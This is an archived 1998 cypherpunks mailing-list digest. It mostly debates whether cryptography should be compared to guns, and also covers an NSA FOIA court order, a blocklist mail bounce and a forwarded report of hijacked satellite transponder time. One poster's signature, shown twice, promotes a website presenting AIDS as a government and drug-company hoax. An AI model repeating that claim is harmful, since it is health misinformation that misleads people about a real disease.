IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 4 May 1998 18:38:58 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: A new Swiss banking novel
In-Reply-To: <Pine.SUN.3.91.980504173014.22503A-100000@baker>
Message-ID: <Pine.LNX.3.96.980504210542.23408A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 May 1998, Xcott Craver wrote:
> 	I advise crypto proponents to halt any analogy-making to 
> firearms, for this reason.  Nothing against guns, of course; but to gain 
> acceptance crypto cannot be dropped in the same conceptual bin as guns.

And spin the same propoganda wheel as the Man? Not me. I don't see crypto
gaining acceptance among the masses out of fear.

Look.. saying "Bad guys can use crypto to not get caught, and they can
use guns to kill people, so lets outlaw crypto and guns." Isn't an 
argument based on reason so much as it is fear. "Bad guys" strike fear
into the hearts of people, and they will do anything to protect
themselves, including shooting themselves in the foot. For every 
bad point that can be found for private ownership of firearms a postive
one can be found. The same goes for crypto. Guns can protect us from
criminals. Criminals can use guns to kill us. Crypto can protect us from
criminals. Criminals can use crypto to protect themselves. The list can
go on and on, and in the end it all will boil down to freedom on the
one hand, and some sick, distorted view of safety on the other.

Fear is more persuasive than rationality.

The people will gravitate to the side that suits them. Freedom is a damn
scary sight, so safety is embraced. If you want to save crypto (and guns
too, btw) talk about freedom and privacy first and crypto second.
It probably won't work though.. just like talking about freedom and
the right to self-defense didn't work with firearms.

As for me.. I don't give a damn how many laws are passed and what sort of
punishments are put into the books: I'll use crypto, get M^S mod N 
tatooed on my forehead, and still say whatever I like. And if "they" want
to talk over my position with me in Room 101, they can take the issue
up with the .45 that I'm not supposed to have.

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNU5rxwKEiLNUxnAfAQGQ0wP/TD3tVmCDwthBnZE1nDaWDY2xzAPNfiMy
HyjyjfxNqYsmIsGpjpaqAWHC+e2qcfaYvPzpMqc0kNmIrFGHd5tA888aVnPbXSw1
0mBIVyITguplGQBLj9YiJk3TFYgU55rmOI3bGHkt/ytoH8CxBMHCOWEkUFR+C489
6GAj62wOO50=
=c7Pc
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 4 May 1998 19:33:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: A new Swiss banking novel
In-Reply-To: <Pine.LNX.3.96.980504210542.23408A-100000@localhost>
Message-ID: <Pine.SUN.3.91.980504205436.22691A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 4 May 1998 mgraffam@mhv.net wrote:
> On Mon, 4 May 1998, Xcott Craver wrote:

> > 	I advise crypto proponents to halt any analogy-making to 
> > firearms, for this reason.  Nothing against guns, of course; but to gain 
> > acceptance crypto cannot be dropped in the same conceptual bin as guns.
> 
> And spin the same propoganda wheel as the Man? Not me. I don't see crypto
> gaining acceptance among the masses out of fear.

	I don't think it's spinning the same propaganda wheel.  In
	fact, if anything, you're probably giving in to "the Man" by 
	letting this view of crypto persist.  That is, IMHO; since
	IMHO the feds are trying to push this view of crypto.

	The implicit connection between crypto and weapons is what 
	will allow the feds to cater to that fear to get it banned.
	Further, as many people simply don't own guns, many are
	easily detached from gun-related issues.  A large part of
	the CA smoking ban was due to this same detachment:  a large 
	non-smoking majority really doesn't give a damn about
	smokers' rights, because they don't see it hurting them.

	The TRVTH is that crypto will be used by just about anyone
	who does anything over an electronic link.  People will
	need it for friendly day-to-day transactions.  A crypto ban
	will be harder to push if people see crypto in this way:
	less like a gun, more like a car or a beeper; maybe useful to 
	criminals but useful in everyday affairs to law-abiding people
	too---nay, NECESSARY--and a silly thing to ban.  

	If you stick with the line that "crypto, like a gun, can
	be used by good guys as well as bad guys," you'll give
	across the opposite impression.  Rather than seeing crypto
	as something they want and will use a lot, many people will see
	crypto as something they probably won't even have in their
	house, something whose actual use is something to be avoided.  
	I mean, you could probably get steak knives banned in today's 
	climate by defending them like that.

							-Xcott




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 4 May 1998 20:12:23 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Ordered to Tell Secrets
Message-ID: <199805050312.XAA10343@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


In an April 30 Memorandum Opinion and Order Senior US 
District of New Mexico Judge Santiago Campos has ordered 
the National Security Agency to produce in camera evidence 
that it can refuse to respond to allegations of NSA intercepts 
of Libyan and Iranian encrypted messages in the 1980s.

   http://jya.com/whp043098.htm  (102K)

This order was issued in repsonse to cryptographer Bill Payne's 
FOIA request for the information as part of his wrongful 
termination suit against NSA and Sandia National Laboratory. 

In the 56-page order Judge Campos reviews the principal 
actions in the suit, and to buttress the order for NSA to 
tell him what it knows about the intercepts invokes recent 
FOIA regulations which more stringently require intelligence 
agencies to substantiate the use of the "Glomar response" 
in refusing to affirm or deny the existence of information on 
the grounds that to do so would  harm national security.

He states that case law requires more diligent review in the case 
of "Glomarization," so he is obligated to make a review in
this instance. He states that based on what NSA has heretofore
provided the court, withholding of information on these intercepts 
does not appear justified.

Campos has reviewed public documents on allegations of 
the Swiss firm Crypto AG's "spiking" of its cryptographic 
equipment (with direction by NSA for backdoors) then 
selling it to Libya and Iran, Crypto AG's employee Hans 
Buehler's story of the work, Reagan's statement on the intercepts,
and other reports, and finds that while the stories are not
authoritative of the USG position, they do warrant his detailed 
review of NSA's Glomar response. 

Campos says, paraphrased, "if NSA continues to have the right 
it claims in this case to determine what is secret and what is not,
then it can declare anything secret and thereby undercut the very 
purpose of the FOIA. That is not acceptable."

It's an impressive summary of the legal conflict between the 
public's right to know and governmental secrecy. And may 
help ease access information on NSA global surveillance 
operations. Or, if Campos decides in NSA's favor, may shut 
the door more securely.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Edwin E. Smith" <edsmith@IntNet.net>
Date: Mon, 4 May 1998 20:29:45 -0700 (PDT)
To: Tim May <tcmay@got.net>
Subject: Re: A new Swiss banking novel
In-Reply-To: <3.0.2.32.19980504211950.0086c620@mailhost.IntNet.net>
Message-ID: <3.0.2.32.19980504232748.00864230@mailhost.IntNet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

At 07:43 PM 5/4/98 -0700, you wrote:
>At 6:19 PM -0700 5/4/98, Edwin E. Smith wrote:
>
>>I agree completely. While I support the right to own guns (and 
nukes)
>>by anyone, guns can be used both ofensively and defensevely while
>>crypto can only be used defensevely.
>>
>>That is unless you put PGP on a stack of diskettes, glue them
>>together and whack somebody with them.
>
>Sorry, but this is nonsense.
>
>Crypto can and has been used just like any other weapon. The freedom
>fighters in Burma who use PGP to communicate securely and to plan 
bombings
>against their oppressors...how can this be said to be "only 
defensive"?
>
>I've said this many times, so I won't spend more time here. All 
"defensive"
>weapons have "offensive" uses. Even shields, even armor, even 
crypto.
>
>To think otherwise is to show no awareness of history.
>
>
>--Tim May
>
>
>"The tree of liberty must be watered periodically with the blood of
>tyrants...."
>---------:---------:---------:---------:---------:---------:---------
:----
>Timothy C. May              | Crypto Anarchy: encryption, digital 
money,
>ComSec 3DES:   408-728-0152 | anonymous networks, digital 
pseudonyms, zero
>W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information 
markets,
>Licensed Ontologist              | black markets, collapse of 
governments.
>
>
>
>

I suppose that you would consider a forearm raised against a baton to 
be offensive also!

Edwin
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNU6HM0mNf6b56PAtEQIINQCg3y9wKdWphewWDNYcQuU6wsB6UpEAniKm
qlII24wLRe3GswRe1o3d27kL
=FK0r
-----END PGP SIGNATURE-----


When freedom is outlawed.......Only outlaws will be free!

If cryptography is outlawed, pomz pvumbxt xjmm ibwf dszquphsbqiz.

Fun! Fast! Revealing! Try "The World's Smallest Political Quiz" at:
   http://www.self-gov.org/quiz.html

IS AIDS A GOVERNMENT/DRUG COMPANY HOAX?
   http://www.virusmyth.com/aids/index.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Mon, 4 May 1998 20:55:31 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: A new Swiss banking novel
In-Reply-To: <Pine.SUN.3.91.980504205436.22691A-100000@baker>
Message-ID: <Pine.LNX.3.96.980504231105.24192B-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 May 1998, Xcott Craver wrote:
> 	I don't think it's spinning the same propaganda wheel.  In
> 	fact, if anything, you're probably giving in to "the Man" by 
> 	letting this view of crypto persist.  That is, IMHO; since
> 	IMHO the feds are trying to push this view of crypto.

I understand this view, but I don't see the worth in whitewashing things
for the public. We've been fed enough BS already.. defending crypto
with ready-made arguments that sound good and don't conjure up images
of firearms is no different to me than spinning a long tale about
Iraqi terrorists and drug dealers that conjure up fear to support the
ban on weapons.

I'd rather speak the truth, so far as I understand it, and let it conjure
up what it may.

> 	The implicit connection between crypto and weapons is what 
> 	will allow the feds to cater to that fear to get it banned.

I understand this. They've got us good. Those that would ban crypto 
would have the public believe that we are all a bunch of crazy, paranoid
math/computer geeks and that the FBI, NSA and their ilk can protect
the public from harm (and us?). That fear will always get fed upon.
That fear will be used to twist things all out of shape until they seem
to be a negative image of what is really there. This happens all the time.

If we are going to combat this stuff, it is going to have to be by
fighting that fear, and not throwing around horse-shit arguments like
big business and the government do. 

If we are going to ease the fear of _guns_, then responsible adults need
to start (or further) gun clubs. Larger clubs need to take part in civic
events to show the people by their actions that they aren't a bunch of
lunatics who shoot at everything that moves. Such clubs need to work with
civilian watch organizations and the police to train citizens to respect
firearms and to help get illegal weapons off the streets. 

Cypherpunks need to write code. We need to show people that strong crypto
isn't just some obscure technology used to lock away kiddie porn and
transmit super-spy doomsday messages. We need to get good, user friendly,
applications to do document signing, watermarking, email encryption, bulk
file encryption, and countless other tasks. These applications have to
be usable; they have to integrate in with the user's desktop and ordinary
applications (MS Word, Photoshop, etc) as well as possible. 

I think that we all know that the uses and benefits of strong crypto
far outweigh the drawbacks. The uses are there, today. If we could plug
strong crypto into the desktop; if the "Kick-ass-military-grade crypto ON"
button were a click away from "Save as.." and if all that were sitting
on John Q. User's naked Cindy Crawford desktop picture, then it would
become as friendly to them as any other feature MS Word, and soon enough
the very statement "Bad guys use crypto" begins to sound dumb because
the fear isn't there anymore.

Fundamentally fear is irrational. The best arguments in the world won't
speak to an irrational person. You have to ease those fears with actions.

Again.. cypherpunks write code.

> 	The TRVTH is that crypto will be used by just about anyone
> 	who does anything over an electronic link.  People will
> 	need it for friendly day-to-day transactions.

Absolutably. I just don't think that they will get this by talking
about how crypto can be used in friendly day-to-day transactions.

>  A crypto ban will be harder to push if people see crypto in this way:
> 	less like a gun, more like a car or a beeper; maybe useful to 
> 	criminals but useful in everyday affairs to law-abiding people
> 	too---nay, NECESSARY--and a silly thing to ban.  

Cheers! :)

> 	If you stick with the line that "crypto, like a gun, can
> 	be used by good guys as well as bad guys," you'll give
> 	across the opposite impression.

But it can. Just like a beeper or a car can. Just like any sort of
technology can. This is the truth, and I'm not in the business of
lying.

When John Q. America tells me that drug dealers use guns, I'll agree
and point to the police officers (damn.. not real good example, but
you get the idea :)

When they quiver in their boots because of IDEA or CAST and tell me
that bad guy Y uses crypto to hide his world domination plans, I'll
agree, and then I'll point to the U.S. defense messaging system.

> 	I mean, you could probably get steak knives banned in today's 
> 	climate by defending them like that.

I'm sure you are right.. but defending them like that is the _truth_
any technology _can_ be used for good or evil.. we have to stop the
people, not the technology. Even though your method may work a little
more efficiently, it tries to cover over the truth; to hide it.

I can't do that. Covering up the truth is a step away from denying it..
an easy step to make going down, but it is one hell of a hard climb
coming back up.

I'll take my chances with C, and maybe some Perl if I'm lucky. If things
really get hairy, I can always resort to the tatoo and the .45

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNU6LygKEiLNUxnAfAQEiXwQAos6MRfoG1zPXfEvcPD5Qp4P/oXImd1IG
Rf4nphQpsla6aqLl4mh618CJ2iOb4wXV+f0JWcge4GQKVULxC3LeqhtJp25uToMc
rAzUg7LrjIkKaB0j8sWmE+7zGuvX7fzDxT+k3UkXFArwS5ZRrGTW0Ec1h8fkA8Ic
Ccft2AXDk+I=
=LjLm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 4 May 1998 23:48:14 -0700 (PDT)
To: mgraffam@mhv.net
Subject: Explaining crypto to people (was Re: A new Swiss banking novel)
In-Reply-To: <Pine.LNX.3.96.980504231105.24192B-100000@localhost>
Message-ID: <Pine.SUN.3.91.980505001000.22926A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 4 May 1998 mgraffam@mhv.net wrote:
> On Mon, 4 May 1998, Xcott Craver wrote:
> 
> I understand this view, but I don't see the worth in whitewashing things
> for the public. We've been fed enough BS already.. defending crypto
> with ready-made arguments that sound good and don't conjure up images
> of firearms is no different to me than spinning a long tale about
> Iraqi terrorists and drug dealers that conjure up fear to support the
> ban on weapons.

	I'm not advocating "ready-made" arguments.  Rather, I'm 
	suggesting that we get rid of an *analogy*.  An analogy isn't
	the truth.  In this case, it's a way to frame the truth 
	for non-technical people.  Dropping an analogy is subtracting
	BS, not adding it.

	Now, I'm not saying analogies are evil, but the analogy
	to firearms is a *bad* one, and it stands to give people
	the misconception that crypto is many things that it is 
	not (not to mention including <stigma.h>).

	If you want to analogize crypto to something, analogize
	it to something crypto is more like.  

> > 	The implicit connection between crypto and weapons is what 
> > 	will allow the feds to cater to that fear to get it banned.
> 
> I understand this. They've got us good. Those that would ban crypto 
> would have the public believe that we are all a bunch of crazy, paranoid
> math/computer geeks

	Well, after all, once we perfect the neural interface, we _will_ 
	all become munitions.

> If we are going to combat this stuff, it is going to have to be by
> fighting that fear, and not throwing around horse-shit arguments like
> big business and the government do. 

	You can't fight fear unless you remove some misconceptions.
	The association with firearms (which is in turn associated
	by the gov't to baaad things) is only going to cause 
	misconceptions in the public arena.	

> If we are going to ease the fear of _guns_, then responsible adults need
> to start (or further) gun clubs. 

	This is, IMHO, the wrong way to remove the fear caused by
	the crypto-firearm analogy.  The right way is to drop the 
	analogy, because it's flawed.  I agree that people should
	be less afraid of guns, but you just don't have TIME to cure
	that, if you can at all.

> I think that we all know that the uses and benefits of strong crypto
> far outweigh the drawbacks. The uses are there, today. If we could plug
> strong crypto into the desktop; if the "Kick-ass-military-grade crypto ON"
> button were a click away from "Save as.." and if all that were sitting
> on John Q. User's naked Cindy Crawford desktop picture, then it would
> become as friendly to them as any other feature MS Word, and soon enough
> the very statement "Bad guys use crypto" begins to sound dumb because
> the fear isn't there anymore.

	..As will the phrase, "cryptography is like a gun...."  Joe User
	won't see authentication as "like a gun" any more than his telephone
	is "like a gun."

> > 	If you stick with the line that "crypto, like a gun, can
> > 	be used by good guys as well as bad guys," you'll give
> > 	across the opposite impression.
> 
> But it can. Just like a beeper or a car can. Just like any sort of
> technology can. This is the truth, and I'm not in the business of
> lying.

	?!!?!!!

	The phase, "now, bad guys can use this to kill you just like 
	a gun, but responsible law-abiding citizens can use it too"
	is true for ALL solid objects larger than a breadbox.  You
	do NOT say this, however, when selling someone a halogen lamp
	or a Tickle-me-Elmo doll, or introducing them to anything
	new that they should have at home.  This doesn't make you a 
	liar.

	It is chillingly naive to defend an argument on the grounds
	that when dissected logically it is a true statement.  
	Do you approve of the government repeatedly warning people that 
	"crypto can be used by terrorists!"  It is, after all, a true 
	statement!  How about the next time you walk through airport 
	security you say, "I could have concealed explosives in my pants."  
	True statement, and you're not in the business of lying.  Would you 
	consider yourself less honest for not saying it?

	See, whatever the truth value of the statement, the end
	result is the suggestion of a lie.  

> I'm sure you are right.. but defending them like that is the _truth_
> any technology _can_ be used for good or evil.. we have to stop the
> people, not the technology. Even though your method may work a little
> more efficiently, it tries to cover over the truth; to hide it.

	Dropping a flawed analogy isn't covering the truth.  Rather,
	keeping the analogy distorts the truth.  It scares and 
	alienates people and makes them think cryptography is this
	weird stuff they'll never personally use which is less
	like a PIN number on steroids and more like plastique.
	And this is the last thing we need.

> Michael J. Graffam (mgraffam@mhv.net)

						-Xcott




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Tue, 5 May 1998 01:00:14 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: Explaining crypto to people (was Re: A new Swiss banking novel)
In-Reply-To: <Pine.SUN.3.91.980505001000.22926A-100000@baker>
Message-ID: <Pine.LNX.3.96.980505025206.25569A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 5 May 1998, Xcott Craver wrote:
> 	I'm not advocating "ready-made" arguments.  Rather, I'm 
> 	suggesting that we get rid of an *analogy*.  An analogy isn't
> 	the truth.

Agreed. The analogy is not the truth, however, it is true firearms,
beepers, cars and another other technology can be used for good or evil.
To treat crypto differently than these other technologies merely because
we have an interest in it is less than desirable. 

What I advocate is to present the view that the technology in all forms
be advanced, and where appropriate disclosed. Undisclosed BS crypto
algorithms have hurt us for to long. Bad design in the telephone system
has done the same. I advocate full disclosure and advancement. When
those who are scared of these things try to leverage fear against it
by saying that undesirable can/will use it, I will not deny this, because
it is true. 

Having said that, I don't really think it is necessary to go around
saying "Crypto is like a bomb" either. Crypto _can_ be used as a defensive
or an offensive weapon, however the same technology can be used for
authentication and digital cash and loads of other neat stuff. I'll
preach about all of them, especially those that I personally have an
interest in.. authentication, digital cash and secure email. 

> 	If you want to analogize crypto to something, analogize
> 	it to something crypto is more like.  

There is a reason that militaries have long used spears and crypto.
I do not mean this statement to conjure fear, but it is true that
crypt can be used as a weapon; it is, after all classified as a
munition, and for good reason when looking for the government's POV.
Certain analogies are useful in certain instances. When useful to
make the analogy to firearms, it _can_ be an excellent one.. so can
a lock. 

Last time I checked though, padlocks aren't a hot topic for debate as
to their being banned. Crypto, in certain aspects, is.

> 	..As will the phrase, "cryptography is like a gun...."  Joe User
> 	won't see authentication as "like a gun" any more than his telephone
> 	is "like a gun."

Right. But I don't trust words to get it done. Most people will believe
what they are told. And I can't scream as loud as the machine.

> 	The phase, "now, bad guys can use this to kill you just like 
> 	a gun, but responsible law-abiding citizens can use it too"
> 	is true for ALL solid objects larger than a breadbox.

Exactly. Which is _precisely_ the reason why outlawing things on the
basis that criminals can use them is insane.

>  You
> 	do NOT say this, however, when selling someone a halogen lamp
> 	or a Tickle-me-Elmo doll, or introducing them to anything
> 	new that they should have at home.  This doesn't make you a 
> 	liar.

No, I dont offer it up because it is irrelevent.. as you say, the same
is true for a breadbox. But if asked point-blank if some technology
can be used for crime Y, I'll admit it if it is true, and then I'll
show the foolishness of this line of thought.. and I'd make that point
that if we take this line of thought to its conclusion we must get
rid of everything larger than a breadbox.

And, after all that, if we are talking about controversial technologies,
individual freedoms and the like, I may just bring up firearms because
it is a technology that is in the same boat as crypto. A munition that
is getting a whole lot of attention.

> 	It is chillingly naive to defend an argument on the grounds
> 	that when dissected logically it is a true statement.  

Are you suggesting that I should defend and argument, when looked at
logically is false?

> 	Do you approve of the government repeatedly warning people that 
> 	"crypto can be used by terrorists!"  It is, after all, a true 
> 	statement!

Yes, it is a true statement.. and so is "crypto can be used by nice old
grandma's to exchange email with the grandkids in NY." Do I approve of
the gov't saying X? Only if they also say it's compliment (which is
equally true) else they are misrepresenting what is true by being
biased. One can take many true statements and present them in a way to
make things seem to be what they are not.

> 	Dropping a flawed analogy isn't covering the truth.  Rather,
> 	keeping the analogy distorts the truth.

See, I don't think that the analogy to weaponry is all that far off.
The exact same software that could let me sign my documents or
order neat stuff over the web can use the exact same algorithms
for transmitting designs for bombs.

Lets face it. Weaponry _is_ a double-edged sword.. so is crypto.
If we say that we want to bring every criminal to justice in the
most efficient way with no regard to anything else, then we should
get rid of crypto.. its as simple as that.. thats pretty obvious.

However, it is also true that weaponry has a good side.. it can
protect us against those criminals that we don't bring to justice.

Crypto has even bigger advantages.. it is _the_ technology that
can fuel completely new ways of commerce and communication..
and it can protect us from the bad guys too.. and, statistically,
a whole helluvalot better than guns can at that.

I don't think that we should make crypto out to be different from
guns in that they are completely different, because there are a lot
of similarities .. how they have been used historically, some of the
pros and cons, etc. This is a very real concern. 

Let me ask you. If you were held hostage, which would you rather have
your captor's exchange of information encrypted with, IDEA or an
aristocrat? What would you rather have the criminals run around with,
guns or clubs? 

The answers are simple, if all we value is our safety.. but this is
what I have tried to convey.. for both of these technologies, crypto and
weaponry.. the reasons for having them around far surpass our concerns
for safety from bad guys. 

I think that weaponry and crypto are related. They both have direct
military uses, and they both have direct civilian uses. Both are
controversial. I think that the analogy between them can be a good
one, in some circumstances. 

Right now, I think that crypto is in a position similar to where firearms
were (minus the hostile environment) during times of exploration in days
past. It stands as a technology that is capable of serving us in a
variety of powerful ways during a time where its application is
vitally important. 
 
Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"Let your life be a counter-friction to stop the machine."
			Henry David Thoreau "Civil Disobedience"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNU7FIgKEiLNUxnAfAQGKQAP9FKyuQeQol3iWzmKt/DvpfVa0q5wmniyK
+8G2+RREtnuCvDF2G13Ik09qMk/+0Ylv5c8IEmPk42p7G19im6W6uu1iGheO1RPn
096mfALKLGVkbXina6d8TsvjQvlhJ++ls+4eKSYOHhppptdsrcC+xqHwB+DqxMNH
SOJeEPkKZho=
=0ylt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 5 May 1998 02:12:22 -0700 (PDT)
To: bill.stewart@pobox.com (Bill Stewart)
Subject: Re: Why are you bouncing my mail to Cypherpunks?
In-Reply-To: <3.0.5.32.19980505014354.00913b60@popd.ix.netcom.com>
Message-ID: <199805050908.EAA02726@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


The antispam assholes suddenly blocked domain ix.netcom.com.

(an amazing thing to do, all in all, and shows how far away from reality
can people be carried out by religion)

It turned out that sendmail at our mail relay site was ckecking 
their "blackhole DNS database".

I deleted all the rules that refer to them and now things seem to be OK.

I am sorry for your troubles, Bill.  Thanks for letting me know.

igor

Bill Stewart wrote:
> 
> Hi, Igor - this bounced.  Is it because I sent it as
> 	stewarts@ix.netcom.com
> instead of
> 	bill.stewart@pobox.com
> (which is how I subscribe, through cyberpass), or is RBL blocking
> Netcom again, or is something else wrong?
> 
> 		Thanks;  Bill
> 
> 
> >Return-Path: <>
> >Received: from dfw-ix13.ix.netcom.com (dfw-ix13.ix.netcom.com [206.214.98.13])
> >	by ixmail7.ix.netcom.com (8.8.7-s-4/8.8.7/(NETCOM v1.01)) with ESMTP id KAA03312; 
> >	for <stewarts@ix.netcom.com>; Mon, 4 May 1998 10:15:35 -0700 (PDT)
> >Received: from localhost (localhost)
> >          by dfw-ix13.ix.netcom.com (8.8.4/8.8.4) with internal
> >	  id MAA15308; Mon, 4 May 1998 12:15:32 -0500 (CDT)
> >Date: Mon, 4 May 1998 12:15:32 -0500 (CDT)
> >From: Mail Delivery Subsystem <MAILER-DAEMON@ix.netcom.com>
> >Message-Id: <199805041715.MAA15308@dfw-ix13.ix.netcom.com>
> >To: <stewarts@ix.netcom.com>
> >Subject: Returned mail: Service unavailable
> >Auto-Submitted: auto-generated (failure)
> >
> >The original message was received at Mon, 4 May 1998 12:14:52 -0500 (CDT)
> >from smap@localhost
> >
> >   ----- The following addresses had permanent fatal errors -----
> ><cypherpunks@algebra.com>
> >
> >   ----- Transcript of session follows -----
> >... while talking to mail.algebra.com.:
> >>>> MAIL From:<stewarts@ix.netcom.com> SIZE=1102
> ><<< 521 <stewarts@ix.netcom.com>... #blocked.contact postmaster
> >554 <cypherpunks@algebra.com>... Service unavailable
> >
> >   ----- Original message follows -----
> >
> >Return-Path: <stewarts@ix.netcom.com>
> >Received: (from smap@localhost)
> >          by dfw-ix13.ix.netcom.com (8.8.4/8.8.4)
> >	  id MAA15254 for <cypherpunks@algebra.com>; Mon, 4 May 1998 12:14:52 -0500 (CDT)
> >Received: from pax-ca6-17.ix.netcom.com(199.35.217.209) by dfw-ix13.ix.netcom.com via smap (V1.3)
> >	id rma015185; Mon May  4 12:14:15 1998
> >Message-Id: <3.0.5.32.19980504100635.008f7950@popd.ix.netcom.com>
> >X-Sender: stewarts@popd.ix.netcom.com
> >X-Mailer: QUALCOMM Windows Eudora Light Version 3.0.5 (32)
> >Date: Mon, 04 May 1998 10:06:35 -0700
> >To: cypherpunks@algebra.com
> >From: Bill Stewart <stewarts@ix.netcom.com>
> >Subject: Forward: --India's INSAT hacked
> >Mime-Version: 1.0
> >Content-Type: text/plain; charset="us-ascii"
> >
> >>From Computer Underground Digest
> >------------------------------
> >
> >Date: Tue, 28 Apr 1998 11:06:30 -0700
> >From: Jeremy Lassen <jlassen@AX.COM>
> >Subject: File 9--India's INSAT hacked
> >
> >Space Age Publishing's India correspondent B. R. Rao reports that
> >"hackers" have succeeded in stealing transponder time on board
> >India's domestic communications satellite, INSAT. The Network
> >Ops. Control Center(NOCC)of India's Dept. of Telecommunications
> >is "...in the process of identifying the culprits".
> >
> >The director of NOCC confirms that a reward has been offered to
> >anyone who can provide information that helps identify the
> >culprits.  Reports indicate the NOCC is aware that "...anybody in
> >possession of the technical details of INSAT and its frequency
> >ranges can at regular intervals tap into its transponders and
> >transmit data free across the globe."
> >
> >I know this is rather vague, but I hadn't read about this
> >anywhere else, and thought that the CUD's readers might find it
> >interesting. Anybody need some transponders time?  :)
> >
> >
> >
> >
> 				Thanks! 
> 					Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 
> 
> 
> 				Thanks! 
> 					Bill
> Bill Stewart, bill.stewart@pobox.com
> PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anonymous@netassist.se>
Date: Mon, 4 May 1998 22:41:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: corvette.bxa.doc.gov
In-Reply-To: <Pine.LNX.3.96.980502032921.355A-100000@localhost>
Message-ID: <93e305df326c177e9c0b2bb0ed69b147@kapten.zoom.nu>
MIME-Version: 1.0
Content-Type: text/plain


mgraffam@mhv.net writes:

> Ahh well.. from your log entries, it seems as if corvette isn't
> necessarily just running a bot. It looks as if humans might be running
> around too. I prefer the bot, personally..

An AltaVista search for the name yields a number of www logfiles
(including MIL sites) that go back until 1996.

FOIA, anyone?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 5 May 1998 07:12:55 -0700 (PDT)
To: william lewis <" Bill.Lewis"@hq.doe.gov>,       tyler przybylek <tomcgap@halcyon.com>
Subject: Payne-Morales vs. NSA: Memorandum Opinion and Order
Message-ID: <354F1D2B.375A@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Tuesday 5/5/98 7:17 AM

Lawyers and MCs

Morales and I met on Monday to discuss strategy for response to

Payne-Morales vs. NSA: Memorandum Opinion and Order

which is cross-linked at http://www.aci.net/kalliste/ from
http://www.jya.com/whp043098.htm

We will, of course, file 

Rule 52. Findings by the Court; Judgment on Partial Findings

    (a) Effect. In all actions tried upon the facts without a jury or 
with an advisory jury, the court shall find the facts specially and 
state separately its conclusions of law thereon, and judgment shall be 
entered pursuant to Rule 58; and in granting or refusing interlocutory 
injunctions the court shall similarly set forth the findings of fact and 
conclusions of law which constitute the grounds of its action. Requests 
for findings are not necessary for purposes of review. Findings of fact, 
whether based on oral or documentary evidence, shall not be set aside 
unless clearly erroneous, and due regard shall be given to the 
opportunity of the trial court to judge of the credibility of the 
witnesses. The findings of a master, to the extent that the court adopts 
them, shall be considered as the findings of the court. It will be 
sufficient if the findings of fact and conclusions of law are stated 
orally and recorded in open court following the close of the evidence or 
appear in an opinion or memorandum of decision filed by the court. 
Findings of fact and conclusions of law are unnecessary on decisions of 
motions under Rules 12 or 56 or any other motion except as provided in 
subdivision (c) of this rule.
    (b) Amendment. On a party's motion filed no later than 10 days after 
entry of judgment, the court may amend its findings--or make additional 
findings--and may amend the judgment accordingly. The motion may 
accompany a motion for a new trial under Rule 59. When findings of fact 
are made in actions tried without a jury, the sufficiency of the 
evidence supporting the findings may be later questioned whether or not 
in the district court the party raising the question objected to the 
findings, moved to amend them, or moved for partial findings.

motion.

